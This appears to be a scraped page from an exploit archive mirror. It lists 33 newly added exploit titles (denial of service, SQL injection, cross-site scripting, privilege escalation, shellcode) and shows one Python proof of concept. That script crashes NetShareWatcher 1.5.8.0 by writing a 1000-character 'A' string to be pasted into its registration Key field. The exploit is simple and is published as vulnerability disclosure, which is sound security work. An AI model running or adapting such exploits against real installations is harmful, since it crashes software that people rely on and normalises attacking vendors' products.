
33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
33 lines
No EOL
971 B
Python
Executable file
33 lines
No EOL
971 B
Python
Executable file
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
|
|
# Exploit Author : Ismail Tasdelen
|
|
# Exploit Date: 2020-01-06
|
|
# Vendor Homepage : http://www.nsauditor.com/
|
|
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
|
|
# Tested on OS: Windows 10
|
|
# CVE : N/A
|
|
|
|
'''
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
1.Download and install NetShareWatcher
|
|
2.Run the python operating script that will create a file (poc.txt)
|
|
3.Run the software "Register -> Enter Registration Code
|
|
4.Copy and paste the characters in the file (poc.txt)
|
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
|
6.NetShareWatcher Crashed
|
|
'''
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 1000
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("poc.txt","w")
|
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
|
f.write(payload)
|
|
f.close()
|
|
print("[+] File created!")
|
|
except:
|
|
print("File cannot be created.") |